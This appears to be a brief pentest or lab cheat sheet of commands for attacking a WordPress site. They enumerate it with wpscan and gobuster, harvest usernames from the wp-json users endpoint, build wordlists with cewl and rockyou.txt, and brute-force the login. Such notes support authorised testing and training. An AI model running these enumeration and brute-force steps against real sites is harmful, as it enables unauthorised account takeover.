Wordpress
WpScan
wpscan --url $(target)/wordpress/
wpscan --url $(target)/wordpress/ --api-token=.....
wpscan --url $(target)/wordpress/ --api-token=..... -U user.lst -P /usr/share/wordlists/rockyou.txt
API
- http://11.22.33.44/index.php/wp-json/
- http://11.22.33.44/index.php/wp-json/wp/v2/users
Create wordlist (pass.lst)
cewl -w pass.lst $(target)/wordpress -d 2
Create wordlist (user.lst)
- based on
/index.php/wp-json/wp/v2/users
Directory enumeration
gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_wordpress.raw
Bruteforce login
wpscan --url $(target)/wordpress -U user.lst -P pass.lst